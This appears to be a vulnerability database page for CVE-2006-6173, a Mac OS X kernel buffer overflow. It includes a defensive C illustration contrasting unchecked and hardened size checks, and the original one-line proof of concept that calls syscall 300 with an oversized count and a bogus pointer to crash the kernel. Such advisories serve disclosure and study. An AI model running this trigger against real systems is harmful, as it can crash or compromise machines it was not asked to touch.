Apple Mac OS X shared_region_make_private_np kernel function buffer overflow vulnerability

Vulnerability ID 1111682  Type Buffer overflow
Published 2006-11-29  Updated 2007-03-14
CVE CVE-2006-6173  CNNVD-ID CNNVD-200611-522
Platform OSX  CVSS score 7.2
|Sources
https://www.exploit-db.com/exploits/29201
https://www.securityfocus.com/bid/21349
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-522
|Details
The shared_region_make_private_np function in vm/vm_unix.c in Mac OS X has a buffer overflow that allows a local user to execute arbitrary code via (1) a small range count that leads to insufficient memory allocation, or (2) a large number of ranges in the shared_region_make_private_np_args argument. Both triggers come from the same root cause: a user-controlled count decides both how much kernel memory is allocated and how many entries the kernel later processes, and the two are not kept consistent. Apple fixed the issue in Security Update 2007-003 (APPLE-SA-2007-03-13).
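The following is an added illustration of the bug class the description points at, written for this page; it is not the xnu vm/vm_unix.c source and does not reproduce Apple's code. It models a user-supplied rangeCount that sizes a kernel buffer and then drives the copy into it, shows how an unchecked count yields either a wrapped, too-small allocation or an enormous request, and places a hardened size computation beside it. The 32-bit size type, the 16-byte range entry, the 1024-entry cap and the sample counts are assumptions, not facts from the advisory.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Added illustration for CVE-2006-6173, not the xnu vm/vm_unix.c source.
 * It models the count-driven allocation pattern the advisory describes:
 * a user-supplied rangeCount decides how big a kernel buffer is, and the
 * same count decides how many entries are later copied into it.
 *
 * Assumptions (not from the page): a 32-bit kernel on 10.4.8, so the size
 * type is 32 bits wide; one range entry is 16 bytes; the cap of 1024 entries
 * in the hardened version is an arbitrary sane bound.
 */
typedef uint32_t k_vm_size_t;                  /* assumption: 32-bit vm_size_t */

struct range_np {                              /* assumption: 16-byte entry */
    uint64_t address;
    uint64_t size;
};

#define RANGES_MAX 1024u                       /* assumption: sane upper bound */

/* Vulnerable pattern: size = count * sizeof(entry), no wrap check, no cap.
 * The product is truncated to the 32-bit size type, so a large count can
 * yield a tiny allocation, and a merely huge count yields a huge request. */
k_vm_size_t ranges_size_unchecked(uint32_t range_count)
{
    return (k_vm_size_t)((uint64_t)range_count * sizeof(struct range_np));
}

/* Entries a count-driven copy loop would write past the end of a buffer
 * sized with ranges_size_unchecked(). Zero means the buffer is big enough. */
uint32_t entries_overflowing(uint32_t range_count)
{
    k_vm_size_t alloc = ranges_size_unchecked(range_count);
    uint32_t fit = (uint32_t)(alloc / sizeof(struct range_np));
    return range_count > fit ? range_count - fit : 0;
}

/* Hardened pattern: reject zero, reject counts above a fixed cap, and only
 * multiply after proving the product fits in the size type (the second
 * check is redundant under the cap but documents the invariant).
 * Returns 0 on success (size in *out), -1 on rejection. */
int ranges_size_checked(uint32_t range_count, k_vm_size_t *out)
{
    if (range_count == 0 || range_count > RANGES_MAX)
        return -1;                                         /* EINVAL */
    if (range_count > UINT32_MAX / sizeof(struct range_np))
        return -1;                                         /* would wrap */
    *out = (k_vm_size_t)range_count * (k_vm_size_t)sizeof(struct range_np);
    return 0;
}

/* Convenience wrapper: the checked size, or 0 when the count is rejected. */
k_vm_size_t checked_size_or_zero(uint32_t range_count)
{
    k_vm_size_t sz = 0;
    return ranges_size_checked(range_count, &sz) == 0 ? sz : 0;
}

int main(void)
{
    /* Constructed inputs: a count whose 16-byte product wraps to 16 bytes,
     * the count used by the exploit on this page, and a benign count. */
    const uint32_t counts[] = { 0x10000001u, 0x8000000u, 4u };
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++) {
        uint32_t c = counts[i];
        printf("rangeCount=0x%08x unchecked size=0x%08x overflow entries=%u "
               "checked size=%u\n",
               c, ranges_size_unchecked(c), entries_overflowing(c),
               checked_size_or_zero(c));
    }
    return 0;
}
```

The first constructed count wraps the 32-bit product to 16 bytes while the copy loop would still walk 0x10000001 entries, which is the under-allocation shape; the exploit's 0x8000000 does not wrap but asks for a 2 GiB kernel buffer, which is the huge-request shape. The hardened function rejects both and accepts only small, non-zero counts.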
|Exploit
/*
source: http://www.securityfocus.com/bid/21349/info

Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. 

Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed.

Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
*/


/*
 * Copyright 2006 (c) LMH <lmh@info-pull.com>.
 * All Rights Reserved.
 * ----           
 *               .---. .---. 
 *              :     : o   :    me want cookie and clues! L0W LEVA! - A J. H
 *          _..-:   o :     :-.._    / 
 *      .-''  '  `---' `---' "   ``-.    
 *    .'   "   '  "  .    "  . '  "  `. 
 *   :   '.---.,,.,...,.,.,.,..---.  ' ;
 *   `. " `.                     .' " .' kudos to ilja, kevin and icer.
 *    `.  '`.                   .' ' .'           "proof of concept" for
 *     `.    `-._           _.-' "  .'  .-------.       MOKB-28-11-2006.
 *       `. "    '"--...--"'  . ' .'  .'  · o   ·`.
 *       .'`-._'    " .     " _.-'`. :  C o C o A :
 *     .'      ```--.....--'''    ' `:_ o      o  :
 *   .'    "     '         "     "   ; `.;";";"; _'
 *  ;         '       "       '     . ; .' ; ; ;
 * ;     '         '       '   "    .'      .-'
 * '  "     "   '      "           "    _.-'
 */

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>     /* syscall(2) prototype; modern compilers reject the implicit declaration */

int main() {
        /* shared_region_make_private_np = 300 (xnu-792.6.70), 3rd arg unused.
         * The first two arguments are handed straight to the kernel handler:
         * an oversized count (0x8000000) and a bogus user pointer (0xdeadface). */
        syscall(300, 0x8000000, 0xdeadface, 0xffffffff);
        return 0;
}
|Affected products
Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.
|References

Source: TA07-072A  Name: TA07-072A  Link: http://www.us-cert.gov/cas/techalerts/TA07-072A.html
Source: XF  Name: macos-sharedregion-privilege-escalation(30569)  Link: http://xforce.iss.net/xforce/xfdb/30569
Source: BID  Name: 21349  Link: http://www.securityfocus.com/bid/21349
Source: VUPEN  Name: ADV-2006-4762  Link: http://www.frsirt.com/english/advisories/2006/4762
Source: SECTRACK  Name: 1017306  Link: http://securitytracker.com/id?1017306
Source: SECUNIA  Name: 23120  Link: http://secunia.com/advisories/23120
Source: MISC  Link: http://projects.info-pull.com/mokb/MOKB-28-11-2006.html
Source: SECTRACK  Name: 1017751  Link: http://www.securitytracker.com/id?1017751
Source: VUPEN  Name: ADV-2007-0930  Link: http://www.frsirt.com/english/advisories/2007/0930
Source: SECUNIA  Name: 24479  Link: http://secunia.com/advisories/24479
Source: APPLE  Name: APPLE-SA-2007-03-13  Link: http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html
Source: docs.info.apple.com  Link: http://docs.info.apple.com/article.html?artnum=305214